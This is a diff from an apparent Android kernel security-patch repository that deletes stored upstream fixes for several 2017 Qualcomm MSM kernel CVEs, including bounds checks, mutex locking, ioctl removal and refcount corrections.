-From 70afce1d9be745005c48fd565c01ce452a565e7e Mon Sep 17 00:00:00 2001
-From: Aravind Kumar <akumark@codeaurora.org>
-Date: Mon, 11 May 2015 15:26:27 +0530
-Subject: ASoC: msm: qdsp6v2: check audio client pointer before accessing
-
-In the registered callback for q6asm, we are checking if
-the audio client pointer is valid and also, dereferencing it
-to get the session ID even though it could be invalid or expired.
-Return and exit immediately if the audio client pointer is
-invalid.
-
-CRs-Fixed: 832914
-Change-Id: I96b722b584a4b5adf8a33891abd75a320e76ea25
-Signed-off-by: Aravind Kumar <akumark@codeaurora.org>
----
- sound/soc/msm/qdsp6v2/q6asm.c | 9 +++++++--
- 1 file changed, 7 insertions(+), 2 deletions(-)
-
-diff --git a/sound/soc/msm/qdsp6v2/q6asm.c b/sound/soc/msm/qdsp6v2/q6asm.c
-index 9a1e0e7..f6a5cb0 100644
---- a/sound/soc/msm/qdsp6v2/q6asm.c
-+++ b/sound/soc/msm/qdsp6v2/q6asm.c
-@@ -1451,8 +1451,13 @@ static int32_t q6asm_callback(struct apr_client_data *data, void *priv)
- 		pr_err("%s: data NULL\n", __func__);
- 		return -EINVAL;
- 	}
--	if (ac->session <= 0 || ac->session > 8 ||
--		!q6asm_is_valid_audio_client(ac)) {
-+	if (!q6asm_is_valid_audio_client(ac)) {
-+		pr_err("%s: audio client pointer is invalid, ac = %p\n",
-+				__func__, ac);
-+		return -EINVAL;
-+	}
-+
-+	if (ac->session <= 0 || ac->session > 8) {
- 		pr_err("%s: Session ID is invalid, session = %d\n", __func__,
- 			ac->session);
- 		return -EINVAL;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8256/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-8256/qcacld-2.0/0001.patch
deleted file mode 100644
index 4a4f5b64..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8256/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,32 +0,0 @@
-From 75e1e00d6b3cd4cb89fd5314a60c333aa0b03230 Mon Sep 17 00:00:00 2001
-From: Manjeet Singh <manjee@codeaurora.org>
-Date: Thu, 22 Dec 2016 18:17:17 +0530
-Subject: qcacld-2.0: Add bounday check for multicastAddr array
-
-In hdd_set_rx_filter API multicastAddr array being accessed beyond
-its size.
-
-Add boundary check for multicastAddr.
-
-CRs-Fixed: 1104565
-Change-Id: I8e1543a8f42ac40c04d2c6a17e69718d13cbd706
----
- CORE/HDD/src/wlan_hdd_main.c | 2 ++
- 1 file changed, 2 insertions(+)
-
-diff --git a/CORE/HDD/src/wlan_hdd_main.c b/CORE/HDD/src/wlan_hdd_main.c
-index 4020488..fab1eac 100644
---- a/CORE/HDD/src/wlan_hdd_main.c
-+++ b/CORE/HDD/src/wlan_hdd_main.c
-@@ -4722,6 +4722,8 @@ static int hdd_set_rx_filter(hdd_adapter_t *adapter, bool action,
- 				    MAC_ADDR_ARRAY(filter->multicastAddr[j]));
- 				j++;
- 			}
-+			if (j == SIR_MAX_NUM_MULTICAST_ADDRESS)
-+				break;
- 		}
- 		filter->ulMulticastAddrCnt = j;
- 		/* Set rx filter */
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8257/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-8257/ANY/0001.patch
deleted file mode 100644
index d8298314..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8257/ANY/0001.patch
+++ /dev/null
@@ -1,182 +0,0 @@
-From 0f19fbd00c6679bbc524f7a6d0fc3d54cfd1c9ae Mon Sep 17 00:00:00 2001
-From: Benjamin Chan <bkchan@codeaurora.org>
-Date: Fri, 17 Feb 2017 14:49:45 -0500
-Subject: msm: sde: Add mutex lock for debug buffer access in rotator
-
-Adding mutex lock access protection to debug buffer for SDE rotator. The
-buffer can be shared between multiple processes, and it is possible that
-one process try to free the buffer while another process is still
-accessing it.
-
-CRs-Fixed: 2003129
-Change-Id: Ib20767f02ba7f14fb972d5c50ab264b2309a1ec2
-Signed-off-by: Benjamin Chan <bkchan@codeaurora.org>
----
- .../platform/msm/sde/rotator/sde_rotator_debug.c   | 39 +++++++++++++++++++---
- .../platform/msm/sde/rotator/sde_rotator_debug.h   |  3 +-
- 2 files changed, 36 insertions(+), 6 deletions(-)
-
-diff --git a/drivers/media/platform/msm/sde/rotator/sde_rotator_debug.c b/drivers/media/platform/msm/sde/rotator/sde_rotator_debug.c
-index a2da663..f41382b 100644
---- a/drivers/media/platform/msm/sde/rotator/sde_rotator_debug.c
-+++ b/drivers/media/platform/msm/sde/rotator/sde_rotator_debug.c
-@@ -990,11 +990,14 @@ static int sde_rotator_debug_base_release(struct inode *inode,
- {
- 	struct sde_rotator_debug_base *dbg = file->private_data;
- 
--	if (dbg && dbg->buf) {
-+	if (dbg) {
-+		mutex_lock(&dbg->buflock);
- 		kfree(dbg->buf);
- 		dbg->buf_len = 0;
- 		dbg->buf = NULL;
-+		mutex_unlock(&dbg->buflock);
- 	}
-+
- 	return 0;
- }
- 
-@@ -1026,8 +1029,10 @@ static ssize_t sde_rotator_debug_base_offset_write(struct file *file,
- 	if (cnt > (dbg->max_offset - off))
- 		cnt = dbg->max_offset - off;
- 
-+	mutex_lock(&dbg->buflock);
- 	dbg->off = off;
- 	dbg->cnt = cnt;
-+	mutex_unlock(&dbg->buflock);
- 
- 	SDEROT_DBG("offset=%x cnt=%x\n", off, cnt);
- 
-@@ -1047,7 +1052,10 @@ static ssize_t sde_rotator_debug_base_offset_read(struct file *file,
- 	if (*ppos)
- 		return 0;	/* the end */
- 
-+	mutex_lock(&dbg->buflock);
- 	len = snprintf(buf, sizeof(buf), "0x%08zx %zx\n", dbg->off, dbg->cnt);
-+	mutex_unlock(&dbg->buflock);
-+
- 	if (len < 0 || len >= sizeof(buf))
- 		return 0;
- 
-@@ -1086,6 +1094,8 @@ static ssize_t sde_rotator_debug_base_reg_write(struct file *file,
- 	if (off >= dbg->max_offset)
- 		return -EFAULT;
- 
-+	mutex_lock(&dbg->buflock);
-+
- 	/* Enable Clock for register access */
- 	sde_rotator_clk_ctrl(dbg->mgr, true);
- 
-@@ -1094,6 +1104,8 @@ static ssize_t sde_rotator_debug_base_reg_write(struct file *file,
- 	/* Disable Clock after register access */
- 	sde_rotator_clk_ctrl(dbg->mgr, false);
- 
-+	mutex_unlock(&dbg->buflock);
-+
- 	SDEROT_DBG("addr=%zx data=%x\n", off, data);
- 
- 	return count;
-@@ -1104,12 +1116,14 @@ static ssize_t sde_rotator_debug_base_reg_read(struct file *file,
- {
- 	struct sde_rotator_debug_base *dbg = file->private_data;
- 	size_t len;
-+	int rc = 0;
- 
- 	if (!dbg) {
- 		SDEROT_ERR("invalid handle\n");
- 		return -ENODEV;
- 	}
- 
-+	mutex_lock(&dbg->buflock);
- 	if (!dbg->buf) {
- 		char dump_buf[64];
- 		char *ptr;
-@@ -1121,7 +1135,8 @@ static ssize_t sde_rotator_debug_base_reg_read(struct file *file,
- 
- 		if (!dbg->buf) {
- 			SDEROT_ERR("not enough memory to hold reg dump\n");
--			return -ENOMEM;
-+			rc = -ENOMEM;
-+			goto debug_read_error;
- 		}
- 
- 		ptr = dbg->base + dbg->off;
-@@ -1151,18 +1166,26 @@ static ssize_t sde_rotator_debug_base_reg_read(struct file *file,
- 		dbg->buf_len = tot;
- 	}
- 
--	if (*ppos >= dbg->buf_len)
--		return 0; /* done reading */
-+	if (*ppos >= dbg->buf_len) {
-+		rc = 0; /* done reading */
-+		goto debug_read_error;
-+	}
- 
- 	len = min(count, dbg->buf_len - (size_t) *ppos);
- 	if (copy_to_user(user_buf, dbg->buf + *ppos, len)) {
- 		SDEROT_ERR("failed to copy to user\n");
--		return -EFAULT;
-+		rc = -EFAULT;
-+		goto debug_read_error;
- 	}
- 
- 	*ppos += len; /* increase offset */
- 
-+	mutex_unlock(&dbg->buflock);
- 	return len;
-+
-+debug_read_error:
-+	mutex_unlock(&dbg->buflock);
-+	return rc;
- }
- 
- static const struct file_operations sde_rotator_off_fops = {
-@@ -1196,6 +1219,9 @@ int sde_rotator_debug_register_base(struct sde_rotator_device *rot_dev,
- 	if (!dbg)
- 		return -ENOMEM;
- 
-+	mutex_init(&dbg->buflock);
-+	mutex_lock(&dbg->buflock);
-+
- 	if (name)
- 		strlcpy(dbg->name, name, sizeof(dbg->name));
- 	dbg->base = io_data->base;
-@@ -1217,6 +1243,7 @@ int sde_rotator_debug_register_base(struct sde_rotator_device *rot_dev,
- 			dbg->base += rot_dev->mdata->regdump ?
- 				rot_dev->mdata->regdump[0].offset : 0;
- 	}
-+	mutex_unlock(&dbg->buflock);
- 
- 	strlcpy(dbgname + prefix_len, "off", sizeof(dbgname) - prefix_len);
- 	ent_off = debugfs_create_file(dbgname, 0644, debugfs_root, dbg,
-@@ -1234,7 +1261,9 @@ int sde_rotator_debug_register_base(struct sde_rotator_device *rot_dev,
- 		goto reg_fail;
- 	}
- 
-+	mutex_lock(&dbg->buflock);
- 	dbg->mgr = rot_dev->mgr;
-+	mutex_unlock(&dbg->buflock);
- 
- 	return 0;
- reg_fail:
-diff --git a/drivers/media/platform/msm/sde/rotator/sde_rotator_debug.h b/drivers/media/platform/msm/sde/rotator/sde_rotator_debug.h
-index c2c6f97..c6d0151 100644
---- a/drivers/media/platform/msm/sde/rotator/sde_rotator_debug.h
-+++ b/drivers/media/platform/msm/sde/rotator/sde_rotator_debug.h
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2015-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2015-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -53,6 +53,7 @@ struct sde_rotator_debug_base {
- 	char *buf;
- 	size_t buf_len;
- 	struct sde_rot_mgr *mgr;
-+	struct mutex buflock;
- };
- 
- #if defined(CONFIG_DEBUG_FS)
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8258/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-8258/ANY/0001.patch
deleted file mode 100644
index ad4c1a65..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8258/ANY/0001.patch
+++ /dev/null
@@ -1,38 +0,0 @@
-From 31e2a2f0f2f3615cefd4400c707709bbc3e26170 Mon Sep 17 00:00:00 2001
-From: Senthil Kumar Rajagopal <skrajago@codeaurora.org>
-Date: Wed, 15 Feb 2017 15:08:09 +0530
-Subject: msm: isp: fix for potentitial array out of bound access
-
-There is no bound check on dual_hw_ms_cmd->num_src,
-which is coming from userspace
-num_src is used as the index for the input_src array
-which has a size of 5.
-The current code did not check the num_src to make sure
-that it never exceeds the input_src array size.
-
-CRs-Fixed: 2006169
-Change-Id: If5927e06e70cce4afb0ae9f2cdfec80f76f83771
-Signed-off-by: Senthil Kumar Rajagopal <skrajago@codeaurora.org>
----
- drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c | 5 +++++
- 1 file changed, 5 insertions(+)
-
-diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c b/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c
-index d8227e7..b2b39e0 100644
---- a/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c
-+++ b/drivers/media/platform/msm/camera_v2/isp/msm_isp_util.c
-@@ -618,6 +618,11 @@ static int msm_isp_set_dual_HW_master_slave_mode(
- 	}
- 	ISP_DBG("%s: vfe %d num_src %d\n", __func__, vfe_dev->pdev->id,
- 		dual_hw_ms_cmd->num_src);
-+	if (dual_hw_ms_cmd->num_src > VFE_SRC_MAX) {
-+		pr_err("%s: Error! Invalid num_src %d\n", __func__,
-+			dual_hw_ms_cmd->num_src);
-+		return -EINVAL;
-+	}
- 	/* This for loop is for non-primary intf to be marked with Master/Slave
- 	 * in order for frame id sync. But their timestamp is not saved.
- 	 * So no sof_info resource is allocated */
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8259/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-8259/ANY/0001.patch
deleted file mode 100644
index 0e034318..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8259/ANY/0001.patch
+++ /dev/null
@@ -1,50 +0,0 @@
-From 68020103af00280393da10039b968c95d68e526c Mon Sep 17 00:00:00 2001
-From: Puja Gupta <pujag@codeaurora.org>
-Date: Mon, 6 Mar 2017 15:04:11 -0800
-Subject: soc: qcom: Avoid possible buffer overflow in service-locator
-
-Fix possible buffer overflow by reading 'resp->total_domains' from the
-qmi response message since 'resp->total_domains' indicate total number
-of matching domains found by servreg.
-'resp->domain_list_len' indicates the domains that could be sent in one
-response which should not be greater than 'resp->total_domains'.
-
-CRs-Fixed: 2009016
-Change-Id: I614561c5f9bc996689129bc098baaffc9b59c377
-Signed-off-by: Puja Gupta <pujag@codeaurora.org>
----
- drivers/soc/qcom/service-locator.c | 11 +++++++----
- 1 file changed, 7 insertions(+), 4 deletions(-)
-
-diff --git a/drivers/soc/qcom/service-locator.c b/drivers/soc/qcom/service-locator.c
-index 8581ed5..0d6c1d6 100644
---- a/drivers/soc/qcom/service-locator.c
-+++ b/drivers/soc/qcom/service-locator.c
-@@ -266,10 +266,9 @@ static int service_locator_send_msg(struct pd_qmi_client_data *pd)
- 		if (!domains_read) {
- 			db_rev_count = pd->db_rev_count = resp->db_rev_count;
- 			pd->total_domains = resp->total_domains;
--			if (!pd->total_domains && resp->domain_list_len) {
--				pr_err("total domains not set\n");
--				pd->total_domains = resp->domain_list_len;
--			}
-+			if (!resp->total_domains)
-+				pr_info("No matching domains found\n");
-+
- 			pd->domain_list = kmalloc(
- 					sizeof(struct servreg_loc_entry_v01) *
- 					resp->total_domains, GFP_KERNEL);
-@@ -286,6 +285,10 @@ static int service_locator_send_msg(struct pd_qmi_client_data *pd)
- 			rc = -EAGAIN;
- 			goto out;
- 		}
-+		if (resp->domain_list_len >  resp->total_domains) {
-+			/* Always read total_domains from the response msg */
-+			resp->domain_list_len = resp->total_domains;
-+		}
- 		/* Copy the response*/
- 		store_get_domain_list_response(pd, resp, domains_read);
- 		domains_read += resp->domain_list_len;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8260/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-8260/3.10/0001.patch
deleted file mode 100644
index 4dcd6ac3..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8260/3.10/0001.patch
+++ /dev/null
@@ -1,82 +0,0 @@
-From 52a2a62a5b0e9dd917bcd9a6d86d674833cc91b7 Mon Sep 17 00:00:00 2001
-From: Gaoxiang Chen <gaochen@codeaurora.org>
-Date: Fri, 31 Mar 2017 14:28:33 +0800
-Subject: msm: camera: don't cut to 8bits for validating enum variable
-
-In msm_ispif_is_intf_valid(),
-we convert a enum variable msm_ispif_vfe_intf,
-to uint8_t type for validating.
-
-This could cause potential issue,
-if the value is crafted in such a way that lower 8bits pass the validation.
-
-Don't use uint8_t as input parm to avoid such vulnerability.
-
-CRs-Fixed: 2008469
-Change-Id: I4ee400ac0edd830decfbe5712966d968976a268a
-Signed-off-by: Gaoxiang Chen <gaochen@codeaurora.org>
----
- drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c | 12 ++++++------
- 1 file changed, 6 insertions(+), 6 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c b/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c
-index 4e07d4d..8409a64 100644
---- a/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c
-+++ b/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c
-@@ -64,7 +64,7 @@ static void msm_ispif_io_dump_reg(struct ispif_device *ispif)
- 
- 
- static inline int msm_ispif_is_intf_valid(uint32_t csid_version,
--	uint8_t intf_type)
-+	enum msm_ispif_vfe_intf intf_type)
- {
- 	return ((csid_version <= CSID_VERSION_V22 && intf_type != VFE0) ||
- 		(intf_type >= VFE_MAX)) ? false : true;
-@@ -347,7 +347,7 @@ static int msm_ispif_subdev_g_chip_ident(struct v4l2_subdev *sd,
- }
- 
- static void msm_ispif_sel_csid_core(struct ispif_device *ispif,
--	uint8_t intftype, uint8_t csid, uint8_t vfe_intf)
-+	uint8_t intftype, uint8_t csid, enum msm_ispif_vfe_intf vfe_intf)
- {
- 	uint32_t data;
- 
-@@ -387,7 +387,7 @@ static void msm_ispif_sel_csid_core(struct ispif_device *ispif,
- }
- 
- static void msm_ispif_enable_crop(struct ispif_device *ispif,
--	uint8_t intftype, uint8_t vfe_intf, uint16_t start_pixel,
-+	uint8_t intftype, enum msm_ispif_vfe_intf vfe_intf, uint16_t start_pixel,
- 	uint16_t end_pixel)
- {
- 	uint32_t data;
-@@ -419,7 +419,7 @@ static void msm_ispif_enable_crop(struct ispif_device *ispif,
- }
- 
- static void msm_ispif_enable_intf_cids(struct ispif_device *ispif,
--	uint8_t intftype, uint16_t cid_mask, uint8_t vfe_intf, uint8_t enable)
-+	uint8_t intftype, uint16_t cid_mask, enum msm_ispif_vfe_intf vfe_intf, uint8_t enable)
- {
- 	uint32_t intf_addr, data;
- 
-@@ -461,7 +461,7 @@ static void msm_ispif_enable_intf_cids(struct ispif_device *ispif,
- }
- 
- static int msm_ispif_validate_intf_status(struct ispif_device *ispif,
--	uint8_t intftype, uint8_t vfe_intf)
-+	uint8_t intftype, enum msm_ispif_vfe_intf vfe_intf)
- {
- 	int rc = 0;
- 	uint32_t data = 0;
-@@ -501,7 +501,7 @@ static int msm_ispif_validate_intf_status(struct ispif_device *ispif,
- }
- 
- static void msm_ispif_select_clk_mux(struct ispif_device *ispif,
--	uint8_t intftype, uint8_t csid, uint8_t vfe_intf)
-+	uint8_t intftype, uint8_t csid, enum msm_ispif_vfe_intf vfe_intf)
- {
- 	uint32_t data = 0;
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8260/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2017-8260/3.18/0002.patch
deleted file mode 100644
index 33705f5a..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8260/3.18/0002.patch
+++ /dev/null
@@ -1,32 +0,0 @@
-From 8f236391e5187c05f7f4b937856944be0af7aaa5 Mon Sep 17 00:00:00 2001
-From: Junzhe Zou <jnzhezou@codeaurora.org>
-Date: Wed, 15 Mar 2017 15:06:04 -0700
-Subject: msm: ispif: fix a bug in checking the validity of vfe intf
-
-Parse the whole length of vfe intf to the validate function to avoid
-the situation that the lower 8bits pass the validation while intf is
-crafted to a large value which can cause buffer overflow later.
-
-CRs-Fixed: 2008469
-Change-Id: I0de19ec36d73918ab2f38eb7ba1f833c02a3face
-Signed-off-by: Junzhe Zou <jnzhezou@codeaurora.org>
----
- drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c b/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c
-index 03aa65d..ccc983f 100644
---- a/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c
-+++ b/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c
-@@ -87,7 +87,7 @@ static void msm_ispif_io_dump_reg(struct ispif_device *ispif)
- 
- 
- static inline int msm_ispif_is_intf_valid(uint32_t csid_version,
--	uint8_t intf_type)
-+	enum msm_ispif_vfe_intf intf_type)
- {
- 	return ((csid_version <= CSID_VERSION_V22 && intf_type != VFE0) ||
- 		(intf_type >= VFE_MAX)) ? false : true;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8260/4.4/0003.patch b/Patches/Linux_CVEs/CVE-2017-8260/4.4/0003.patch
deleted file mode 100644
index f6dfaab4..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8260/4.4/0003.patch
+++ /dev/null
@@ -1,32 +0,0 @@
-From 7b7534d96813ffe502271b0b3fae0d0d12e3e05b Mon Sep 17 00:00:00 2001
-From: Junzhe Zou <jnzhezou@codeaurora.org>
-Date: Wed, 15 Mar 2017 15:06:04 -0700
-Subject: msm: ispif: fix a bug in checking the validity of vfe intf
-
-Parse the whole length of vfe intf to the validate function to avoid
-the situation that the lower 8bits pass the validation while intf is
-crafted to a large value which can cause buffer overflow later.
-
-CRs-Fixed: 2008469
-Change-Id: I0de19ec36d73918ab2f38eb7ba1f833c02a3face
-Signed-off-by: Junzhe Zou <jnzhezou@codeaurora.org>
----
- drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c b/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c
-index 1628c098..cb7b2a1 100644
---- a/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c
-+++ b/drivers/media/platform/msm/camera_v2/ispif/msm_ispif.c
-@@ -73,7 +73,7 @@ static void msm_ispif_io_dump_reg(struct ispif_device *ispif)
- 
- 
- static inline int msm_ispif_is_intf_valid(uint32_t csid_version,
--	uint8_t intf_type)
-+	enum msm_ispif_vfe_intf intf_type)
- {
- 	return ((csid_version <= CSID_VERSION_V22 && intf_type != VFE0) ||
- 		(intf_type >= VFE_MAX)) ? false : true;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8261/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-8261/3.10/0001.patch
deleted file mode 100644
index 61f054bd..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8261/3.10/0001.patch
+++ /dev/null
@@ -1,99 +0,0 @@
-From 2a2f0b7463f4de9ca225769204ff62c71760709c Mon Sep 17 00:00:00 2001
-From: Sudarshan Rajagopalan <sudaraja@codeaurora.org>
-Date: Thu, 6 Apr 2017 16:15:48 -0700
-Subject: ashmem: remove cache maintenance support
-
-The cache maintenance routines in ashmem were causing
-several security issues. Since they are not being used
-anymore by any drivers, its well to remove them entirely.
-
-CRs-Fixed: 1107034, 2001129, 2007786
-Change-Id: I955e33d90b888d58db5cf6bb490905283374425b
-Signed-off-by: Sudarshan Rajagopalan <sudaraja@codeaurora.org>
----
- drivers/staging/android/ashmem.c | 41 ----------------------------------------
- include/uapi/linux/ashmem.h      |  3 ---
- 2 files changed, 44 deletions(-)
-
-diff --git a/drivers/staging/android/ashmem.c b/drivers/staging/android/ashmem.c
-index ee79ac8..f13aab2 100644
---- a/drivers/staging/android/ashmem.c
-+++ b/drivers/staging/android/ashmem.c
-@@ -32,7 +32,6 @@
- #include <linux/mutex.h>
- #include <linux/shmem_fs.h>
- #include <linux/ashmem.h>
--#include <asm/cacheflush.h>
- 
- #include "ashmem.h"
- 
-@@ -659,37 +658,6 @@ static int ashmem_pin_unpin(struct ashmem_area *asma, unsigned long cmd,
- 	return ret;
- }
- 
--static int ashmem_cache_op(struct ashmem_area *asma,
--	void (*cache_func)(const void *vstart, const void *vend))
--{
--	int ret = 0;
--	struct vm_area_struct *vma;
--	if (!asma->vm_start)
--		return -EINVAL;
--
--	down_read(&current->mm->mmap_sem);
--	vma = find_vma(current->mm, asma->vm_start);
--	if (!vma) {
--		ret = -EINVAL;
--		goto done;
--	}
--	if (vma->vm_file != asma->file) {
--		ret = -EINVAL;
--		goto done;
--	}
--	if ((asma->vm_start + asma->size) > vma->vm_end) {
--		ret = -EINVAL;
--		goto done;
--	}
--	cache_func((void *)asma->vm_start,
--			(void *)(asma->vm_start + asma->size));
--done:
--	up_read(&current->mm->mmap_sem);
--	if (ret)
--		asma->vm_start = 0;
--	return ret;
--}
--
- static long ashmem_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
- {
- 	struct ashmem_area *asma = file->private_data;
-@@ -735,15 +703,6 @@ static long ashmem_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
- 			ashmem_shrink(&ashmem_shrinker, &sc);
- 		}
- 		break;
--	case ASHMEM_CACHE_FLUSH_RANGE:
--		ret = ashmem_cache_op(asma, &dmac_flush_range);
--		break;
--	case ASHMEM_CACHE_CLEAN_RANGE:
--		ret = ashmem_cache_op(asma, &dmac_clean_range);
--		break;
--	case ASHMEM_CACHE_INV_RANGE:
--		ret = ashmem_cache_op(asma, &dmac_inv_range);
--		break;
- 	}
- 
- 	return ret;
-diff --git a/include/uapi/linux/ashmem.h b/include/uapi/linux/ashmem.h
-index 7ec977f..7797439 100644
---- a/include/uapi/linux/ashmem.h
-+++ b/include/uapi/linux/ashmem.h
-@@ -34,8 +34,5 @@ struct ashmem_pin {
- #define ASHMEM_UNPIN		_IOW(__ASHMEMIOC, 8, struct ashmem_pin)
- #define ASHMEM_GET_PIN_STATUS	_IO(__ASHMEMIOC, 9)
- #define ASHMEM_PURGE_ALL_CACHES	_IO(__ASHMEMIOC, 10)
--#define ASHMEM_CACHE_FLUSH_RANGE	_IO(__ASHMEMIOC, 11)
--#define ASHMEM_CACHE_CLEAN_RANGE	_IO(__ASHMEMIOC, 12)
--#define ASHMEM_CACHE_INV_RANGE		_IO(__ASHMEMIOC, 13)
- 
- #endif /* _UAPI_LINUX_ASHMEM_H */
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8261/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2017-8261/3.18/0002.patch
deleted file mode 100644
index 8480a4d8..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8261/3.18/0002.patch
+++ /dev/null
@@ -1,33 +0,0 @@
-From 8576feebaf688dadf0548b9a16d2b90b76ed714c Mon Sep 17 00:00:00 2001
-From: Trishansh Bhardwaj <tbhardwa@codeaurora.org>
-Date: Tue, 18 Apr 2017 14:44:43 +0530
-Subject: msm: camera: Fix kernel overwrite GET_BUF_BY_IDX ioctl
-
-Assign address of buf_info into ioctl_ptr.
-Previously we were copying first 8 bytes of buf_info (content)
-into ioctl_ptr. Which is dereferenced and written later causing
-kernel overwrite vulnerability.
-
-Change-Id: Ie5deae249da8208523027f8ec5632f960757e9bd
-Signed-off-by: Trishansh Bhardwaj <tbhardwa@codeaurora.org>
----
- drivers/media/platform/msm/camera_v2/msm_buf_mgr/msm_generic_buf_mgr.c | 3 +--
- 1 file changed, 1 insertion(+), 2 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/msm_buf_mgr/msm_generic_buf_mgr.c b/drivers/media/platform/msm/camera_v2/msm_buf_mgr/msm_generic_buf_mgr.c
-index 882ab03..d0b265a 100644
---- a/drivers/media/platform/msm/camera_v2/msm_buf_mgr/msm_generic_buf_mgr.c
-+++ b/drivers/media/platform/msm/camera_v2/msm_buf_mgr/msm_generic_buf_mgr.c
-@@ -554,8 +554,7 @@ static long msm_buf_mngr_subdev_ioctl(struct v4l2_subdev *sd,
- 				sizeof(struct msm_buf_mngr_info))) {
- 				return -EFAULT;
- 			}
--			MSM_CAM_GET_IOCTL_ARG_PTR(&k_ioctl.ioctl_ptr,
--				&buf_info, sizeof(void *));
-+			k_ioctl.ioctl_ptr = (uintptr_t)&buf_info;
- 			argp = &k_ioctl;
- 			rc = msm_cam_buf_mgr_ops(cmd, argp);
- 			}
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8262/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-8262/3.10/0001.patch
deleted file mode 100644
index 62263ec7..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8262/3.10/0001.patch
+++ /dev/null
@@ -1,53 +0,0 @@
-diff --git a/drivers/gpu/msm/kgsl.c b/drivers/gpu/msm/kgsl.c
-index 640e6c1..57e3ea3 100644
---- a/drivers/gpu/msm/kgsl.c
-+++ b/drivers/gpu/msm/kgsl.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2008-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2008-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -167,8 +167,11 @@
- {
- 	struct kgsl_mem_entry *entry = kzalloc(sizeof(*entry), GFP_KERNEL);
- 
--	if (entry)
-+	if (entry) {
- 		kref_init(&entry->refcount);
-+		/* put this ref in the caller functions after init */
-+		kref_get(&entry->refcount);
-+	}
- 
- 	return entry;
- }
-@@ -3019,6 +3022,9 @@
- 	trace_kgsl_mem_map(entry, param->fd);
- 
- 	kgsl_mem_entry_commit_process(private, entry);
-+
-+	/* put the extra refcount for kgsl_mem_entry_create() */
-+	kgsl_mem_entry_put(entry);
- 	return result;
- 
- error_attach:
-@@ -3343,6 +3349,9 @@
- 	param->flags = entry->memdesc.flags;
- 
- 	kgsl_mem_entry_commit_process(private, entry);
-+
-+	/* put the extra refcount for kgsl_mem_entry_create() */
-+	kgsl_mem_entry_put(entry);
- 	return result;
- err:
- 	kgsl_sharedmem_free(&entry->memdesc);
-@@ -3382,6 +3391,9 @@
- 	param->gpuaddr = entry->memdesc.gpuaddr;
- 
- 	kgsl_mem_entry_commit_process(private, entry);
-+
-+	/* put the extra refcount for kgsl_mem_entry_create() */
-+	kgsl_mem_entry_put(entry);
- 	return result;
- err:
- 	if (entry)
diff --git a/Patches/Linux_CVEs/CVE-2017-8262/3.10/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2017-8262/3.10/0001.patch.base64
deleted file mode 100644
index 126f126e..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8262/3.10/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
